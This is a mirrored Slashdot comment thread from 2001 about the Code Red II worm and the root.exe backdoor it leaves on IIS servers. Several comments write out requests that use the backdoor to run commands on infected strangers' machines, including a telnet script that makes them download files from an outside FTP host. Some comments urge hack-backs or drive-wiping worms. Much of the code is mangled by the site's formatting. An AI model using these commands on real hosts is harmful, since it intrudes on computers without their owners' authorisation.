Slashdot Mirror
Code Red II: Shells for the Taking
sigurdur writes "It seems there is a new and more malicious version of Code Red out there. This one seems to try and copy cmd.exe into a position where it is accesible to us all - the scripts directory. So far I have seen it reported on the intrusions-list at incidents.org where they also just put up a notice about this third generation Code Red worm." I still think sircam is more annoying since it affects every email user, and not primarily poorly administered websites. But imagine how much bandwidth Code Red and Sircam have wasted in the last few weeks?
How about if somebody writes a default.ida script which sends the attacking server a GET /default.ida which makes the server go to miscrosoft.com, download and install the patch, and reboot itself? That'd be neat.
...
I've created a script that parses my server logs for code red hits, then prints up a webpage with each ip linked to "http://[ipaddy]/scripts/root.exe?/c+dir+c:\". It's amazing how many people's computers are just wide open. It's really easy to create, rename, delete, or display just about any file on the poor saps computer. For example, "http://[ipaddy]/scripts/root.exe?/c+echo+IIS+SUCK S!+>+c:\CODEREDATETHELASTOFYOURCORNFLAKES.txt".
I mean, errr, hypothetically it would be possible to do such things, uhhh yeah.
Actually, yes it is based on Code Red Mountain Dew, and Pepsi evidentally didn't regard it as negative advertising, as last week they shipped over tons of cases of Code Red MD to the EEye team that named it.
You wasted packets to get this lousy sig.
You need to put down the Gibson crack pipe and start speaking in real-world terms. Square pegs? Ace of spades? Random hallucinatory metaphors do not a persuasive argument make.
Do you have an example of how malformed packets could be used to "take over" something? They're occasionally effective tools for DOS (though less and less as IP protocol handler authors stop making silly assumptions), and I do recall one FreeBSD ipfw vulnerability that hinged on the ability to set a certain flag in the packet header, but basically this is not such a big issue. All the fun and power is at higher levels - in the application layer.
"Patriotism is your conviction that this country is superior to all other countries because you were born in it." -- GBS
None of the above.
The two historical precedents that come to mind are:
- The Grand Canyon midair collision on 30 June 1956
- The sinking of the Titanic
In both cases, technologies failed in ways that (in hindsight) were predictable and even inevitable consequences of growth beyond the their roots. In both cases, the response was moderate, incremental, and designed to preserve existing investments in these technologies. The lesson is that the "breaking point" for a widespread infrastructural technology is very hard to reach. And, like it or not, Windows is one of these technologies.Instead, what we'll see happen is more attention to security, taken in small steps. More people will subscribe to alert services, and they'll be willing to pay more for them. Bosses will start asking sysadmins what they've done for security today, and be more willing to sign purchase orders for security-related work. ISPs will pay a bit more attention to open ports on their home users, and some will scan their networks for known security vulnerabilities. OEMs configuring systems for naive users will discover that people will pay for a "safe out of the box" configuration, so they'll start to offer one. And so on, and so on....
The normal state for an economically useful thing is to be stressed, but not stressed to the breaking point. This should be pretty obvious: if it's not stressed, it was uneconomically overbuilt. We are very far from the breaking point for Windows.
Submissions can be made by following these instructions.
Key to financial independence: Spend less than you earn. Save and invest the difference. Do it for a long time.
A Pepsi product (mountain dew), actually
crack the code
Tastes like cough syrup but has a pretty good kick (hate to think about what that much red food color does to your internal organs though).
There is much cruelty in the universe, John.
Yeah, we seem to have the tour map.
I kind of find myself wondering, which wastes more bandwidth: the virus itself of all of the discussion about the virus?
I'm assuming the virus wastes vastly more. That said, take a look at the way every news site is covering it, the large images they have accompanying the stories and the vast numbers of people reading them because MSN messenger tells them it's important. I don't know if there is any way of measuring the bandwidth wasted by each but it'd be an interesting ratio to see, if there was.
First one of the top dogs in the place sent sircam throughout the company. This was a really bad hair day.
Then they had a separate second problem where user mail boxes flooded out crashing the mail server, among other strange things. Imagine users with DSL lines sending out multimegabyte files that bounce. Considering that most ISPs configure the drive space for mail based on average usage of users, and do not set aside the actual amount of drive space for user mail, etc. that has been promised for all users.
BOOM!
If this keeps happening, this is going to be bad for business in a lot of places.
"It is a greater offense to steal men's labor, than their clothes"
Actually, they moved it to akamai, a large network of servers distributed across the internet. Requests are spread out over several servers, thereby making the site as a whole more resistant to DDOS. (They just happen to be Linux). Microsoft did the same thing with their DNS servers after these were DDOS'd earlier this year. A network like Akamai may be the only real defense against a good DDOS (syn flood, spoofed IPs) that doesn't involve ignoring some lgeitimate requests as well as the trash.
"that's not encryption - it's a new perl script that I'm working on..." - from some Matrix parody
Anyways, if cable modem users are seeing drastically increased ARPing, the targeting of the Code Red III variant should explain it -- hitting non-existent addresses on your subnet will cause the CMTSheadend router to ARP out to see who's got that address, you get the picture.
At the very least, it's a good opportunity for users to see how many modems your provider has packed onto your segment. If they've packed too many on there, you can be sure the CMTS router's going to get seriously bogged down.
I have an automated program which sends the IP addresses to the ARIS list *and* to my ISP's security department (those IP's which fall under their management) -- I wonder if ISP's are considering just dropping all packets from infected hosts, so when the customer comes to them and complains, they say "Oh, you're infected, reboot, install the patch, and we'll reconnect you." Seems that this would reduce the load on the CMTS and would be faster than trying to track down each customer individually.
Chad Loder
Rapid 7, Inc. - Next generation security products and services
http://www.rapid7.com
No, someone needs to write a strand that simply shuts down (or better yet wipes out the hard drives of) MS IIS servers. They're a hazard to everyone else on the internet and should be removed.
PLEASE MIRROR THIS and post your mirror URLs in reply to this message (subject Mirror of CodeRed2) since that server is a club server, low bandwidth, low budget. But very secure (Debian on Sparc and well maintained :-)
SlashDot (the pikers )-: wouldn't let me post directly to this page.
Got time? Spend some of it coding or testing
If you consider that @Home's acceptable use policy explicitely says that running servers isn't allowed... there are two interesting things to note. First, there are a lot of people running public web servers that @Home just ignores. Another thing is that it probably wouldn't be a problem legally for @Home to minimize the impact of code red by blocking port 80 traffic like they did with port 137, at least temporarily.
Unfortunately, it doesn't look like the root.exe installed by Code Red has Administrator privaleges, which iisreset.exe needs. Or at least, that's my guess, since it isn't working.
$x='S24;r)>63/* h@<5+oZ)32"5cz';$me='phroggy'x$];
$x=~y+ -xz+\0-Tx+;print$_^chop$me for split'',$x;
You can't sue MS (they are bigger then the govt prectically). But you can probably sue and company which uses IIS and stores your personal data. If that comapny was using IIS and they failed to patch their system then they have been criminally negligent in their duties. A few suits and all companies will drop IIS like a hot potato.
Everybody wins.
War is necrophilia.
There's been an IIS patch available for several months which blocks the hole exploited by CodeRed. You can't sue M$ for negligence but you might be able to sue any of the web server owners who haven't applied the patch.
Actually, there has been a beneficial effect with CodeRed (in the UK at least). I have seen several reports on British network news programmes that talk about "security flaws in M$ software", not "security flaws in the Internet". It's quite a step forward for the media here not to treat M$ software and Internet / PC software as being effectively synonymous. There is a faint but real message that the problem is Microsoft.
All I want is a secure system where it's easy to do anything I want. Is that too much to ask ~~ Randall Munroe
try this:
/scripts/root.exe?/c+echo+ren+root.exe+badrootexpl oit+>+fixme.cmd HTTP/1.0
/scripts/root.exe?/c+echo+echo+^>+root.exe+>>+fixm e.c md HTTP/1.0
/scripts/root.exe?/c+echo+attrib.exe+root.exe+%u00 2Br+>>+fixme.cmd HTTP/1.0
/scripts/root.exe?/c+echo+dir+>>+fixme.cmd HTTP/1.0
/scripts/root.exe?/c+type+fixme.cmd HTTP/1.0
/scripts/root.exe?/c+fixme.cmd HTTP/1.0
GET
GET
GET
GET
GET
GET
this way it renames the old root.exe, creates a new dummy one, and write protects it so it can't be overwritten by a simple copy command.
If God gave us curiosity
I'm having 2 to 4 alerts every minute from the @home network or road runner.
It's crazy.
onepoint
if you see me, smile and say hello.
So unless it caused noticable congestion it makes no difference in that respect.
---
BDOS ERR ON A:>
Well, right now a lot of people are sending their logs to Dshield, who then notify the owners of the infected machines. grep default.ida access_log* | mail -s 'APACHE' redalert@dshield.org
I get this. I think it means IIS is running on a desktop version of Windows (NT4WKS or W2KPro) rather than a server.
===
The page cannot be displayed
There are too many people accessing the Web site at this time.
---
Please try the following:
Click the Refresh button, or try again later.
Open the 65.29.102.77 home page, and then look for links to the information you want.
HTTP 403.9 - Access Forbidden: Too many users are connected
Internet Information Services
---
Technical Information (for support personnel)
Background:
This error can occur if the Web server is busy and cannot process your request due to heavy traffic.
More information:
Microsoft Support
Yes, the nick is flamebait
I think the notion is that it affects non-Windows people as recipients of unwanted random files. (Code Red affects non-Windows people as port 80 hits, too, but that's relatively trivial, and unlikely for minimally-connected dialup people.)
Except that the strange HTTP requests it puts out cause problems with some embedded webservers...
- sourceforge.com was hacked
- themes.org was hacked
- apache.org was hacked
- the ramen worm
- the lion worm
- the knark rootkit
Things were so bad that Microsoft felt cocky enough to make claim that open source software has "inherent security risks".Well, you can quite rightly laugh at Mundie now for his audacity, but it's ridiculous to start calling for lawsuits against software makers. Do you really believe there is never going to be another exploit targeting open source software? Do you want the creators of that open source software to be sued too when that happens?
Microsoft is a big company, and it can afford lawsuits like that. But if, say, the creators of BIND were sued for an exploit, that would probably be the end of BIND. And it's unlikely anyone would be eager to write an open source replacement, with the threat of lawsuits looming over any potential open source project.
Yabbut that's *still* not "all of us," as with SirCam.
Though, interestingly enough, I haven't seen SirCam. I run a mailing list server, and usually I get a nice sampling of darn near everything caught in the spamtrap... I saw Melissa from a European subscriber way in the wee hours of the morning, which was handy since my then-employer needed a sample to feed to its mail filter. And I still see Snowhite once every couple of days. But no SirCam.
Not that I'm complaining, mind you...
Slashdot's token middle-aged housewife
It's gotten to the editors! It's everywhere! It causes itself to be posted multiple times per day! Hide the women and children!
Slashdot 's editors are dickheads
Time the long-awaited "Finger of God" script. Fdisk 'em!
Intelligent Life on Earth
(Copied from the other thread, for those who are working on a way to fix this worm)
/pub/cr
/scripts/root.exe?+%2fc+echo+bin+%3etmpfile | telnet $1 80
/scripts/root.exe?+%2fc+echo+get+$DIR%2f$2+%3e%3et mpfile | telnet $1 80
/scripts/root.exe?+%2fc+echo+ftp+%2dA+%2ds%3atmpfi le+$FTP+%3edlfile%2ecmd | telnet $1 80
/scripts/root.exe?+/k+dlfile%2ecmd | telnet $1 80
:)
I played around for a few hours with this, trying to make a ghetto script that would fix the servers. There's no way for me to be sure my other stuff works, but the thing I did get working was a script to download files to the infected server from an ftp site.
#!/bin/sh
# Code Red ][ Download File script
# Usage: dlfile.sh infectedIP filename
#
# Please set the $ftp and $dir values to
# the ftp and directory of the patch and shutdown repository
# For ftp.youhavesetup.com
FTP="ftp%2eyouhavesetup%2ecom"
# Directory
DIR="%2fpub%2fcr"
echo GET
sleep 1
echo GET
sleep 1
echo GET
# Note that slashcode inserts a space in the string 'tmpfile' on both these lines, remove before running
sleep 1
echo GET
I tried setting it up and got the servers to download the patches, but I can't be sure that they are actually run. (I don't have an infected machine to test.) Also, I was unable to figure out a way to get the machines to reboot or restart IIS. It appears root.exe has limited permission in what it can do (as another poster or two stated.) There might be hacks that will do what I want to, but I'm too tired to mess with this anymore
--
I've always wanted to be able to telnet into my Windows box. Where can i get this virus?
--
Mod up a post Rob doesn't like and you'll never mod again
Don't hold your breath. You think a post critisizing MS will get modded up? On slashdot? Yea right! The MS posse will soon mod it down.
War is necrophilia.
And I will now duck for all those people who will tell you you shouldn't install X on anything connected to the internet. Do a man on tcpdump to see what switch will save traffic to text-readable file.
Enjoy
Yes, I'm seeing an ungodly number of ARP requests as well, which may also be Code Red connected. (Who knows.)
-Rob
Is he still using it? The answer to that question really determines weather or not he is a dufus.
War is necrophilia.
Well, I haven't seen that yet, but I saw something even funnier:
999.999.999.999 - - [04/Aug/2001:23:43:18 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXJust_Kidding___Now_H ow_About_Running_Apache_Instead_of_IIS HTTP/1.0" 404 282 "-" "-"
(Yes, just some guy with a sense of humor and a web browser, not enough Xs to trigger the overflow ;-)
And even the clueless ones who continue to use inherently defective software such as Outlook and IIS have as much right to sue MS as people who smoked for 50 years have to sue tobacco firms...
Sueing software makers for bugs is a "bad idea". How many open source authors are going to want to be held liable for that when they don't even get paid for their work? Not many.
:0 BD o8OkQ6SD
* > 100000
* mDmcOaA5pDmoOaw5sDnAOeA56DnsOfA59Dn4Ofw5ADoEOgg6H
/dev/null
That is probably illegal, and certainly a bad idea (self reproducing code almost always causes problems even when you don't intend it to) but what I wonder is if you could get away with creating a CGI called default.ida that attempted to automatically connect back to the client, disinfect the machine, and install a patch. It is much less dangerous since it doesn't reproduce, and you could certainly make the argument that it was only done in retaliation to someone (unwittingly) attempting to infect your computer with a virus.
Nope, look at your EULA
I've got a cable modem on nash1.tn.home.com, and my iptables log is seeing a huge number of hits (we're talking an average of several a minute, more or less) to port 80. Since I'm not actually running a web server, I don't have the logs that tell me if this is in fact Code Red, but I suspect that's what a huge amount of this activity is.
It's depressing, really.
-Rob
Speaking of Code Red, mountain dew code red is a highly malicious blend of virus, cough syroupe, and caffeine. All are bad except caffeine. Just like this virus, all are bad on windows machines, except those which arent windows machines. I guess linux is like the caffeine of all soda. The good parts :-)
"If a man watches 3 football games in a row he should be declared leagaly dead" - A
I think Code Red (and Sircam, which your average Joe will probably lump together with Code Red in his mind) will be the virus that breaks the camel's back. It's gotten constant publicity, it's coming back for a second round, and this time, it wants blood.
:-) Seriously, though, things may get slow, but I have a feeling vigilante efforts (counter-worms, Apache scripts that reboot infected attacking Win boxes, etc.) will keep this from happening.
What will happen? I don't know, but here are some possibilities:
Revolt against Microsoft software. We'd all love for this to happen, but their PR machine is probably too good. Still, we can always hope people realize that MS bears a large part of the responsibility here.
Lawsuit. Assuming the virus writers aren't found, the next logical targets will be Microsoft, and owners of a large number of infected hosts. Why it probably won't happen: suing Microsoft over this draws attention to the fact that your company's computer systems are insecure, and that your admins were too lazy/stupid to install the patch. Microsoft can always hide behind their patch, which was available well in advance, and claim that "everyone knows that bugs happen, and it's up to admins to keep up to date" (never mind that this contradicts their own marketing material--when has inconsistency ever stopped marketing before?). Suing somebody with a large bunch of infected hosts is also silly, since, to be infected by them, you have to be just as inept as them.
Government Intervention. Some state governors may push silly state bills, but they'll be irrelevant. What would really get interesting is if the Feds pass some sort of laws, either making people responsible for keeping their systems secure, or defining what kind of liability software manufacturers are exposed to in these circumstances (i.e., can you sue MS? For how much?). Why it probably won't happen. With Congress and Bush on vacation, not much will get done in at least the next month, and things will probably have come to a head before then. Only if this round does serious damage (perhaps the world's biggest DDoS against some high-profile targets, like Akamai), and another generation of Code Red pops up in September (just in time to catch all those college PCs with their pirated copies of Windows 2000 Server and high bandwidth), will this become a real possibility.
Internet Collapses. I really doubt it, I just had to say it to satisfy Cringley
So, which will it be, folks? This would make a great SlashPoll.
I can understand admins not patching when the fix first hit. The usual "Won't happen to me problem". But now? After all this press? All the news stories?
:)
I think the systems we're seeing infected now are either workstations with IIS installed and the user doesn't know/remember, or server with no real support staff sitting in a closet somewhere. Now the question is, will they EVER get patched?
Someone whip up a worm that patches systems. Be like a cyberwar from the movies. How cool is that?
heheh! Not only is it a fine remote administration feature, but it's also pretty slick the way machines upgraded in this way advertise their new status to everyone with a webserver on port 80.
Geeky modern art T-shirts
To notify the administrators of the attacking servers you can send their IP followed by the date and time of the attack to aris-report@securityfocus.com. - Please use this format because it's a robot address. http://securityfocus.com/announcements/310
Right now my NIC is flickering like mad, yet Windows 2000 does not show these as incoming or outgoing packets. What is going on?
I wanted to know would it be possible to make a similar virus for Linux using a Bash Shell.
If not, why not?
I still think sircam is more annoying since it affects every email user
Every email user?!? CmdrTaco must run Windows. Let's get him!
Microsoft's EULA prohibits me from suing them for bandwith charges for the stuff their crap throws at my Linux/Apache setup?
Wow, they must have better lawyers than I thought.
Is there a Windows command line equivalent to "shutdown -h now", by any chance? I know I really shouldn't do it, but I'd be so sorely tempted to write a script that would shut down any infected box that scanned mine.
The more I think about it, the more it seems like a permissible act of self defense. It does no harm to the infected box (if the worm doesn't write itself to disk, as I've read, it actually helps) and prevents the infected box from being used to perpetuate more abuse.
Hmm . . .
Because those who are most vulnerable to the wormvirus are the companies with the most clueless sysadmins, the set of machines with uninstalled service packs (and running Index Server by out-of-the-box default, the vulnerable component) probably largely overlaps the set of Code Red machines.
Yes, having to administer one of these along with Solaris and Linux boxen, I've patched mine; trivial).
It's not if as many /.ers need to be told about the existence of the DEL command, and the intellectual leap required to recognize that the ability to execute an arbitrary command implies the ability to execute a particular command seems rather modest to me.
But before we mod this down as an insult to the intelligence of the /. readership, there is a more interesting issue: This particular inspiration is going to occur to a fair number of vandals, kiddies, and assorted undersocialized individuls. Many of them will do something more destructive with it than posting it to slashdot. More generally, the level of sophistication needed to attack a CRII-compromised machine is low, much lower than even script-kiddie level, low enough that any moderately determined wolfcub with a bent hairpin and a telnet client can do tremendous damage.
Thus, CRII has suddenly created and widely advertised a pool of very vulnerable machines. It would not be surprising to find that the worst damage is done by vandals following along behind CRII, just as looters follow behind natural disasters.
If you take the water away completely and hold the frog over the heat sorce itself it will roast.
Sorry, I'm "in a mood" today and I couldn't help myself.
Still, it's interesting. If you put the frog in cold water and slowly turn up the heat what it will do, being cold blooded, is go to sleep long before it dies and *poaches.*
What is the relevance and why should anyone care? Lobster.
The correct way to cook a lobster, not matter what *anyone* tells you, is to put it in cold water and bring the heat up. The lobster relaxes and goes to sleep before it cooks.
If you just dump it in hot water it goes " Eeeeeeeeeeee," tightens up all of its muscles and pumps lactic acid throughout its system before it dies.
Starting in cold water is both more humane and results in quite noticably tastier lobster.
KFG
OR, one group could patch all those infected hosts...or at least notify the admins.
I've got a full analysis of this at http://braddock.com/cr2.html
...timothy and cmdr Taco both showed up to work today wearing matching golf shirts and Dockers pants. Upon further inspection, it was determined that they also had the exact same type of socks, shoes, and belts (they stopped short of comparing underoos). At some point, Hemos was quoted as saying, "You know, I think you two should talk to each other before coming in to work."
--------
Bleah! Heh heh heh... BLEAH BLEAH!!! Ha ha ha ha...
Well, the EULA still applies :) You couldn't sue Microsoft, but you could sue the companies whos servers are infected(and hence spamming your box).
MS has absolutely no liability(legally) in this particular instance. Personally, I think it's gross negligence on their part, and I think some *severe* measures are in order.
Quite frankly, I don't give a shit that they're a monopoly. My local telephone monopoly is *wonderful*. Very nice, very courtesous. As a business owner and a consumer, I'm very happy with them. But Microsoft is just plain mean and negligent.
Dave
Barclay family motto:
Aut agere aut mori.
(Either action or death.)
Extra credit: Disinfect the machine with the security patch from the MS Web Site.
As this would be completely passive (Rather than patching the code red code) it should be slightly less dangerous than releasing a new worm to the net. And since it would affect only machines that have already been compromised, it should be slightly less ethically questionable than patching the worm code to do something new and the releasing it. I'm sure I'll get flamed for suggesting it nonetheless...
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
I was curious just how often RedCode attacks. Sure, looking through the apache log files is nice, but it just didn't give me the sense of urgency... the quick succession at which attacks take place. So, I whipped up a quick perl script to play a noise every time I was "attacked". Needless to say, it's getting kind of annoying, but it still is incredible:
/var/log/your-access.log | grep XXXXXXXXXXXXX | cut -d \" \" -f 1 | wc -l > attacks_b"); /dev/null");
#!/usr/bin/perl
while(1) {
system("cat
$returnval = system("diff attacks_a attacks_b >
if(0!=$returnval) {
system("cp -f attacks_b attacks_a");
system("play buzzer2.aiff &");
}
sleep(1);
}
char sig[120] = "\0"
From the article:
The FBI has dismissed using any hack-back tactic as well. "It is not something that we could consider," said spokeswoman Debbie Weierman. "It would basically be viewed as an unauthorized intrusion."
It's not clear from the article whether such an 'unauthorized intrusion' by a private citizen would be illegal, but it might be worth thinking about before you go riding out to do battle with the Red Worm.
Let me make sure I understand this one.
/var/log/apache/access.log
/var/log/apache/access.log | mawk '{print($1) }'
I grep \?XXX from
grep \?XXX
Then, for each result, I can telnet to port 80 and remote root the machine with a single get request for scripts/cmd.exe ??
I have 45 such hits in my log files, mostly from machines at my ISP. That is truly ridiculous.
That's pretty damned amazing. To think that weather can be determined by a simple yes or no question.
My only political goal is to see to it that no political party achieves its goals.
Here's where I got:
Suggestions? (Non-destructive, please, the goal is to alert not hurt)-- @rjamestaylor on Ello
With all those destructive virus-writers groups and everything, you'd think by now there'd be an Illuminati-type secret organization of white hat programmers somewhere out there that cripple viruses and release a "serum" strain to innoculate systems and close MS's holes.
It would be illegal of course, but, well, Robin Hood broke the law too.
(I'm not advocating this of course, just thinking it's curious no such organization exists)
W
-------------------
This is my SIG. There are many like it, but this one is mine.
GET
tried that. Unfortunately, you need cygwin wget. Is there an explorer.exe equivalent to wget?
I've been recording the hits of V1 and V2 from my machine since early this afternoon, thanks to a very handy Perl script provided by another Slashdot user.
You can find the results and a link to the script here
I do think that MS deserves some blame because they have made it insanely easy to administrate an NT box functionally by insanely hard to do so competently. The OS is user friendly but very obfuscatory (note that even apple never marketed Macintosh as a server, at least not until OS X-- they sold servers running Apple UNIX). How many questions on the MCSE exams covered planning for disaster recovery or planning for internet security (hint: less than one)? Those of us who prefer UNIX do so because it is easier to administrate properly though it requires more knowledge to do basic tasks... The learning curve is constant and does not get as steep as NT's does...
Microsoft also has a history of poor security programming. For example, the Microsoft implemtation of PPTP uses the users a hash of network password for the encryption key for the session. This does not necessarily make it easy to break into an account, but it does effectively prevent any forward security because your key will not change until your password does... I would not trust them with any critical information or production servers, and that includes IIS.
Not that it matters really-- of FreeBSD and Linux can gain enough dominance, they can effectively take the money out of the small server OS (fewer than 4 processors) and that would be a major blow to Microsoft and it would prevent them from being able to make billions off that industry...
LedgerSMB: Open source Accounting/ERP
Though I feel like one about now... long night. :)
Those are going to a shared e-mail alias. I get copies of everything, as well as a few other people. Unfortunately, because they are coming in many format types, we have to compile them by hand. But absolutely, please do send us the logs and have them in the format requested.
Holy crap. http://www.msnbc.com/news/606910.asp
Always do right. This will gratify some people and astonish the rest. -- Mark Twain
I send you this file to have your advice!
....proudly sports the "Powered by Win2000 Server logo".
I fucking know that you are running Win2k server, that's why you're infected with code red and attacking my poor linux box ;)
"Mary had a crypto key, she kept it in escrow, and everything that Mary said, the Feds were sure to know."
MSNBC has a longer story.
Fox News has a few words to say.
ABC copied the AP story.
CBS still seems to think the red tide is receeding.
Meanwhile the worm has knocked on my computer's door six times since I started this post. Uh, make that seven.
While I realize that the press release is unlikely to cover his side of things, this doesn't sound like an equivalent situation. If you have more info, pass it along... I'm not familiar with the case and may be totally off-base. The primary difference seems to be that the other machines weren't attacking his.
The idea of having machines do directed retaliation against attacks is something the government itself uses, as I believe do some companies. While I will grant that changing things on someone else's computer is on questionable ground, I also think that given the circumstances (a machine is attacking yours with a virus) you are probably on safe ground to respond. I think it would only be legal if it was in non-self-propagating form - that is, only used as an automatic response to an attack.
That said, it would be a lot safer if you could filter out governmental IPs... those are the only ones that would be likely to cause any major fuss.
~ Leilah
This is exactly why an infected server should be rebuilt and properly secured...
LedgerSMB: Open source Accounting/ERP
jill.c. Don't regard it as a malicious exploit, it's infact a very powerful remote administration tool. All our NT boxes are not attached to Internet so we don't worry. :)
Why don' t you add a checking to stay away from Apache servers?! The worm would be more difficult to trace without all those access.log evidence....
/usr/log/apache man.
You are overloading my
To automatically notify webmasters of infected sites, if you have mod_perl/Apache, use this script:
h prerm
http://forum.swarthmore.edu/epigone/modperl/nehza
It identifies any attempt to access '/default.ida', looks up the MX records of the remote IP, and sends a notification to postmaster@. It is not a 'hack back', just a notification email.
Or you could setup default.ida as a perl script that telnets to the ip's 25 port and sends an email with the fact they have a box thats screwed.. like the guy did here.
so they can keep a count of the infections and see how the worm is propagating through the networks. I myself have been hit 154 times today, but that's a low number because my ISP made our cable modems go dynamic addressing recently. A link to the source code can be found on the page and here. Check frequently, as he updated the code a couple of revisions just today.
"Beware of he who would deny you access to information, for in his heart, he dreams himself your master."
A user on grc.security (news.grc.com) suggested using the Windows "net send" command to send a pop-up message to the infected user. net.exe won't talk across the Internet, but you ought to be able to run the net.exe program on the rooted IIS box, something like:
n et +send+%25COMPUTERNAME%25+You+have+been+infected+by +the+Code+Red+II+Worm+which+attempted+to+attack+my +server
http://ipaddress/c/inetpub/scripts/root.exe?/c+
%25COMPUTERNAME%25 translates to %COMPUTERNAME%, which returns the Windows hostname. I know that works from one of my failed attempts that gave me a reply, but with the above string, I get back a page with "Error in CGI Application" as
the title:
CGI Error
The specified CGI application misbehaved by not returning a complete set
of HTTP headers. The headers it did return are:
and it doesn't give me any return. Can anyone verify and/or debug this? It *might* be working.
The %USERDOMAIN% variable might be useful too, so you could send to the whole Windows domain, "Machine LUSER on DOOFUSDOMAIN is infected with Code Red II" or some such. %USERDOMAIN% is the machine name on systems on a workgroup.
I've been having fun with that myself - I have a list of everyone who hit me here.
Lots are home users who probably don't realize that they have IIS running, but there are a few sites that look like decent sized places.
Last week: 92
Last 32 hours: 196 (175 unique addresses)
Looks like it's concrete bunker time soon... )-:
Got time? Spend some of it coding or testing
Microsoft's products spew pollution into the information space like a burning mountain of tires.
For sure! Take a look at my webserver (which pioneers the great new feature of a "Log File Chat Room" (tm 2001 Lawrence Wade)).
This new variant seems to have been especially active, it's eating up a lot of my bandwidth. Last time, my IP address wasn't getting scanned as much as many other people I spoke with; I'm wondering if this one includes a better random number seed. I'm also seeing IIS victims from my ISP.
Also, I wonder if a disclaimer stating that infected IIS servers are not allowed to visit my website would be sufficient to work towards suing Microsoft for their ongoing gross negligence and complicity causing material and financial damage.
Fire and Meat. Yummy.
* > 100000
* mDmcOaA5pDmoOaw5sDnAOeA56DnsOfA59Dn4Ofw5ADoEOgg6H
Okay. Forgive me if the syntax is off, I've never had to play with procmail filters. But it strikes me that this one would be significantly more useful:
* X-mailer=Outlook
:)
Fire and Meat. Yummy.
"that's not encryption - it's a new perl script that I'm working on..." - from some Matrix parody
Yelling, "There should be a law!" just makes you look like a dumb liberal that needs the government to protect him from himself.
For sure, and such a law would stifle innovation far more than Microsoft has. Imagine the liability in releasing a beta (or... gasp! an alpha) version?
Now, I think there have to be other ways to go after Microsloth, more than legislation. What's needed is a judge - perhaps one as braindead as the one who awarded millions to the dumb woman who spilled coffee on her lap - who can be used to our advantage in a class-action lawsuit from all victims of the default-dangerous Microsoft machines in the field.
Fire and Meat. Yummy.
The McDonals coffee case judge was not braindead. get teh facts straight, they have been mentioned even here hundreds of times already. The coffee was hot enough to cause severe burns on contact, and McD knew it was so and they still sold the coffee at such temperature.
You're kidding, right? I think you are, but I'm not sure. Okay. Well, I'll treat my response as if you're serious.
I worked at a McDonalds, aeons ago, when I was in high school. Like, 1991. Probably when you were still in kindergarten.
I worked there for four years. My first year, it was hell, I was minimum wage scum, but McDonalds is like the army: you get out of it exactly what you put into it.
Well, I was nice with everyone, and I always arrived on time, and I always worked hard. And I was quickly awarded Employee of the Month. Less than a week after that, I was asked to come in for a staff meeting. I thought I was in trouble for something. All the managers sat me down very seriously, and asked me if I knew why I was there. They passed me a package and told me to sign for its receipt. I did, then I opened the package. It was a manager's uniform with my name on the little gold tag.
I got to know a lot about McDonalds and its customers in the 3 years that followed. It was, believe it or not, a great job and I made a lot of friends working at McDonalds with whom I'm still in touch.
As a part time ("Swing") manager, I got to help ensure that the restaurant ran smoothely. Ordering supplies, ensuring the staff have everything they need, resolving conflicts, assuring quality control, and dealing with customer complaints.
One of the most common customer complaints was that the coffee was too cold. And yet, as part of my quality control role, I was responsible for ensuring that the temperatures on every cooking appliance were correct when I started my shift. The coffee, at the time, was to be kept at 85C.
Now, of course, since some slovenly white trash got rich because of her own stupidity, I'm sure the customer complaints about cold coffee are even more common. From what I understand, the coffee is to be kept at 73C now.
Of course it's hot. Coffee is supposed to be hot. Next thing is people will start suing over Eskimo Pie migraines they get when they drink their cold Coke too quickly.
GM recently got sued for several billion dollars. It was Christmas Eve in about 1995 when this tragedy occured. A family was riding along in their 1978 Chevy Malibu (already an old car). They were stopped at a red light, and a drunk driver hit them from behind. The car's gas tank exploded, and while the family were all concious and relatively unhurt, when they got out, one of the kids had third degree burns to his leg. So they sued GM for faulty fuel tank design.
Now, one thing about this case that terrifies me is that this was a 17-year-old car at the time of the accident. Who knows what nature of wear had been experienced? Rusted out gas tank? For all we know, this car shouldn't have been on the road to begin with.
The other thing that terrifies me is that the jury wasn't allowed to hear how fast the vehicle that rear-ended them was travelling. Remember, they were stopped at a traffic light. They were hit by a drunk driver in a full-size pickup truck travelling at 75MPH. Approximately 120km/h.
Changes things a little, doesn't it? How survivable is that accident?
Rather than suing GM because a 17 year old car blew up when it was rear-ended by a 4,000lb mass travelling at 75MPH, I think I'd be writing a letter to GM to thank them for the fact that despite such a horrific accident, I still had both my kids.
Your remark suggests a tacit support of the excessive litigation against businesses. My wish upon you is that you mortgage your house, open a business, and get sued by someone who gets a paper cut off your first invoice.
Fire and Meat. Yummy.
A disproportionate number of the hits on my (Australian) web servers [sources] are from asian countries, leading me to suspect that perhaps the non-English versions of the patch and/or some of the prerequisite Service Packs were released late and/or not as well publicised.
If I was forced to ride shotgun on one of these security sieves, I'd be checking for patches twice daily. And I'd have the sucker behind a non-M$ reverse proxy.
Got time? Spend some of it coding or testing
Not so easy, the right service packs appear to be required first. So your little proggie would first have to determine what was needed, second download and install it all, then finally clean off the rootshell.
Got time? Spend some of it coding or testing
I don't care what temperature you set it to when YOU worked at mcdonalds, dumbass. The woman got THIRD DEGREE burns. That is TOO HOT for coffee. Idiot.
Yeah. So, she's apparently not intelligent enough to be trusted with coffee, or tea, or hot chocolate... I'd also draw the line at giving her a driver's license. In fact, I'd legislate that people like her should have to wear helmets everywhere they go.
I can't drink coffee at 73C, let alone 85C. But I also know that at 85C, people complain that the coffee is too cold. Those are the edicts from McDonalds, not the temperature at which I independently chose to set the Bunn's thermostat.
So? I carefully put my coffee aside and let it cool.
As for the third degree burns, you can get third degree burns from something that is a mere 50C. Note that is the temperature to which most hot water heaters are set. Are you therefore a proponent of a law requiring everyone to turn down their hot water heaters to 37C so that they can't burn people? Heck, there are lots of other things that can burn you. If you're stupid, take the back cover off your monitor. Right at the back of the picture tube's neck, you'll find that there is an area of glass heated by radiant heat leaving the cathodes. Rest your finger there and see how many yucks you have. Let's ban monitors because they can hurt people. Let's ban stoves because a child could turn on a burner and scorch himself. Let's ban cars because the radiator gets warm. Of course, we can't let people have bicycles, either, there are many ways to get hurt on *those*, least of which being the elevated temperature of the brake pads after stopping.
You, sir, like the bovine hausfrau who was too stupid to ensure that her coffee didn't spill on her lap, are the idiot. If I were President, I'd find you and your peers a nice little padded cell somewhere so that you may avoid any sort of risk or personal responsibility for your activities.
